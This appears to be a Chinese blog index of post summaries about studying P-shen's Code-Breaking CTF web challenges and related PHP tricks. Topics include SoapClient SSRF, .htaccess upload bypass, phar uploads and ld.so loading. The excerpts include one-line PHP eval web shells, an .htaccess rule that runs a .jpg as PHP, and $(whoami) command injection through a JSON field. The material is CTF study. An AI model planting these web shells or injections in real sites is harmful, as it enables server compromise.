Galio

摘要： 今天继续在P神举办的codebreaking比赛中学习trick，这道题的名字是phplimit。 index.php: <?php if(';' preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); 阅读全文

摘要： 继续跟着p神学代码审计，今天学codebreaking中的phpmagic这道题，先放上源码： <?php if(isset($_GET['read-source'])) { exit(show_source(__FILE__)); } define('DATA_DIR', dirname(__FI 阅读全文

摘要： 看P神的文章，学习web安全知识的前沿技术栈和各种tricks，这真是一个充满乐趣的过程。 这是code breaking上的第二题：pcrewaf 首先先回顾一下php文件上传的相关代码： 前端form表单：<form action="upload_file.php" method="post" 阅读全文

摘要： 最近刚刚加入了P神的代码审计知识星球，希望跟着大神不断钻研web安全前沿知识，学到各种tricks，看到了Code-Breaking Puzzles活动，学习一下。 源码： <?php $action = $_GET['action'] ?? ''; $arg = $_GET['arg'] ?? ' 阅读全文

摘要： 调用一个SoapClient类的对象的不存在方法时，SoapClient类会发送一个独立的http请求，是独立、纯净的http请求，没有换行覆盖其他数据什么的，只是在请求内部构造正常的换行。 SoapClient发送get请求： <?php $target='http://127.0.0.1/fla 阅读全文

摘要： 知识： soapclient类的发送请求怎么构造还不太了解，构造请求的时候要设置一个简单的cookie，因为最后要换这个cookie来看soapclient发送请求的响应结果 因为是脚本文件自己执行的，soapclient发出的http请求的$_SERVER["REMOTE_ADDR"]是127.0 阅读全文

摘要： 一、.htaccess文件上传方法一： FileMatch 参数即为文件名的正则匹配<FilesMatch "1.jpg"> SetHandler application/x-httpd-php</FilesMatch>// 1.jpg<?php eval($_GET['a']);?> 方法二：Ad 阅读全文

摘要： 动态库链接器/加载器 当需要动态链接的应用被操作系统加载时 系统必须要定位然后加载它所需要的所有动态库文件 在Linux环境下，这项工作是由ld-linux.so.2来负责完成的 执行操作时操作系统会将控制权交给 ld-linux.so 而不是交给程序正常的进入地址 ld-linux.so.2 会寻 阅读全文

摘要： 第一种解法： 上传个1.phar，文件内容为<?php @eval($REQUEST[8]);?> 第二种解法： 利用spl_autoload_register的特性 具体用法如下： <?php spl_autoloader_register(); $demo=new FXXK(); ?> 如果本文 阅读全文

摘要： 简言之，就是抓包，修改json里的数据，写个$(whoami)/mskiss 能命令执行 去查了一下，$(whoami)就是可以命令执行，效果和反引号一样。 阅读全文